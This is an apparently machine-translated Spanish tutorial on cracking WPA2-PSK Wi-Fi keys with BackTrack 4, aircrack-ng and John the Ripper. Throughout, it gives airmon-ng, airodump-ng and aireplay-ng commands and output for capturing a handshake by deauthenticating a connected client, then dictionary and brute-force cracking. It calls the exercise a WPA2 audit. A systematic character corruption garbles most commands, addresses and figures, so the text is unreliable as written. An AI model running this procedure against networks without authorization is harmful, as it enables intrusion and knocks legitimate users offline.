Está en la página 1de 3

CRACKING WPA2-PSK CON BACKTRACK 4, AIRCRACK-NG Y JOHN EL DESTRIPADOR

Poner la interfaz en modo monitor Buscar red inalmbrica (protegida con WPA2 y una clave previamente compartida) Capturar todos los paquetes spere !asta que vea a un cliente y des"autenticaci#n el cliente$ por lo que el apret#n de manos puede ser capturado Crac%ear la clave usando un arc!ivo de diccionario (o por medio de &o!n '!e (ipper) )oy a usar una interfaz de *lin% *W+",-22 (./B) de red inalmbrica para este procedimiento0 n bac%trac%1$ este dispositivo se reconoce como 2lan30

n primer lugar$ poner la tar4eta en modo monitor5


root6bt578 airmon"ng 9nterface 2ifi3 at!3 at!2lan3 C!ipset At!eros At!eros At!eros (alin% 2:;< ./B *river mad2ifi"ng mad2ifi"ng )AP (parent5 2ifi3) mad2ifi"ng )AP (parent5 2ifi3) rt;<usb " =p!y3>

root6bt578 airmon"ng start 2lan3 9nterface 2ifi3 at!3 at!2lan3 C!ipset At!eros At!eros At!eros (alin% 2:;< ./B *river mad2ifi"ng mad2ifi"ng )AP (parent5 2ifi3) mad2ifi"ng )AP (parent5 2ifi3) rt;<usb " =p!y3> (monitor mode enabled on mon3)

?% a!ora podemos utilizar la interfaz mon3 )amos a encontrar una red inalmbrica que utiliza WPA2 @ P/A5
root6bt578 airodump"ng mon3 CB C >= lapsed5 1 s >= 233D"32"2- -25:; PW( "<< /'A'9?F 335-C5BG5D35:B5A< Beacons : 8*ata$ 8@s 3 PW( "2D 3 CB -3 EB :1 +ost -2 FC C9PB ( A.'B P/A Probe 'estFet //9* 'estFet

B//9* 335-D5:B5:25A*5G; B//9* 335-D5:B5:25A*5G;

WPA2 CCEP Pac%ets 1

(ate 3" -

*e4ar de airodump"ng y e4ecutar de nuevo$ escribiendo todos los paquetes en el disco5


airodump"ng mon3 ""c!annel -3 ""bssid 335-D5:B5:25A*5G; "2 @tmp@2pa2

n este punto$ usted tiene dos opciones5 o bien esperar a que un cliente se conecta y el 1"Way Bands!a%e se !aya completado$ o des"autenticaci#n un cliente eHistente$ por lo que la fuerza para volver a asociar0 l tiempo es dinero$ asI que vamos a obligar a los des"autenticaci#n0 Fecesitamos que el bssid de la AP ("a) y el Eac de un cliente conectado ("c)
root6bt578 aireplay"ng "3 - "a 335-D5:B5:25A*5G; "c 335-C5BG5D35:B5A< mon3 -<5315-D Waiting for beacon frame (B//9*5 335-D5:B5:25A*5G;) on c!annel -3 -<531523 /ending C1 directed *eAut!0 /'EAC5 =335-C5BG5D35:B5A<> =C;JCC ACAs>

Como consecuencia$ airodump"ng deber indicar KApret#n de manos WPA5K en la esquina superior derec!a
CB -3 >= B//9* 335-D5:B5:25A*5G; B//9* 335-D5:B5:25A*5G; lapsed5 2 mins >= 233D"32"2- -<531 >= WPA !ands!a%e5 335-D5:B5:25A*5G; PW( (LM "<< -33 /'A'9?F 335-C5BG5D35:B5A< Beacons -<<N PW( "2; 8*ata$ 8@s DD (ate :1":1 3 CB -3 +ost 3 EB :1 FC C9PB ( A.'B P/A //9* 'estFet

WPA2 CCEP Pac%ets 2<3 Probe

*e4ar de airodump"ng y asegOrese de que los arc!ivos fueron creados correctamente


root6bt5@8 "r2"r""r"" "r2"r""r"" "r2"r""r"" ls @tmp@2pa2P "al - root root <:-ND 233D"32"2- -<531 @tmp@2pa2"3-0cap - root root 1;C 233D"32"2- -<531 @tmp@2pa2"3-0csv - root root :D3 233D"32"2- -<531 @tmp@2pa2"3-0%ismet0csv

Gorma de este momento$ usted no necesita estar cerca de la red inalmbrica0 'odas las grietas que suceder en lInea$ para que pueda de4ar airodump y otros procesos e incluso a pie de la AP0 *e !ec!o$ me permito sugerir a pie y se encuentra un lugar acogedor donde se puede vivir$ comer$ dormir$ etc 0000 (omper una clave WPA2"P/A se basa en la fuerza bruta$ y puede tomar un tiempo muy muy largo0 Bay dos formas de fuerza bruta5 una que es relativamente rpido$ pero no garantiza el QHito y uno que es muy lento$ pero garantiza que se encuentra la clave en algOn momento en el tiempo +a primera opci#n es el uso de un arc!ivo de lista de traba4o @ drstionary0 Euc!os de estos arc!ivos se pueden encontrar en 9nternet (por e4emplo$ o en 2220t!eargon0com pac%etstorm (ver los arc!ivos))$ o pueden ser generados con !erramientas como &o!n '!e (ipper0 .na vez que la lista de palabras se crea$ todo lo que necesita !acer es e4ecutar aircrac%"ng con la lista de traba4o y alimentar la G9 0 'apa que contiene el protocolo de intercambio WPA20 AsI que si su lista de palabras se llama 2ord0lst (en @ tmp @ listas de palabras)$ puede e4ecutar
aircrac%"ng R2 @tmp@2ordlists@2ord0lst "b 335-D5:B5:25A*5G; @tmp@2pa2P0cap

l QHito de crac%ing la clave WPA2"P/A est directamente relacionado con la fuerza de su arc!ivo de contraseSas0 n otras palabras$ puede que tenga suerte y consigue la llave muy rpido$ o puede que no obtenga la clave en absoluto0 l segundo mQtodo (fuerza bruta) ser un QHito seguro$ pero puede tomar aSos en completarse0 'enga en cuenta$ una clave WPA2 puede ser de !asta C1 caracteres$ por lo que en teorIa serIa la construcci#n de todas las combinaciones de contraseSa con todos los 4uegos de caracteres posibles y darles de comer a aircrac%0 /i desea utilizar &o!n

'!e (ipper para crear todas las posibles combinaciones de contraseSas y darles de comer en aircrac%"ng$ este es el comando a utilizar5
root6bt578 @pentest@pass2ord@4tr@4o!n ""stdout ""incremental5all J aircrac%"ng "b 335-D5:B5:25A*5G; "2 " @tmp@2pa2P0cap

Actualizaci#n5 *espuQs de 23 !oras de formaci#n de grietas$ la clave aOn no se !a encontrado0 l sistema que estoy usando para romper las claves no es muy rpido$ pero ec!emos un vistazo a algunos !ec!os5 N caracteres$ caracteres sin formato (mayOsculas y minOsculas) o dIgitos T cada persona4e en la clave podrIan tiene 2C 2C -3 (C2) combinaciones posibles0 Por lo que el nOmero mHimo de combinaciones que deben ser verificados en el proceso de fuerza bruta es de C2 P C2 P C2 P C2 P C2 P C2 P C2 P C2 T 2-N <13 -3: :N1 NDC a alrededor de C33 claves por segundo en mi KlentitudK del sistema$ podrIa tomar ms de -3-3N<<N2 !oras para encontrar la clave (--$:<D aSos)0 Be de4ado el proceso de formaci#n de grietas en mi mquina es demasiado lento para obtener la clave$ mientras que todavIa estoy vivo 000 AsI que piensa en esto cuando se !ace una auditorIa WPA2"P/A0

,racias l material fue sacado y traducido de

Corelam 'eam
se respeta los derec!os

También podría gustarte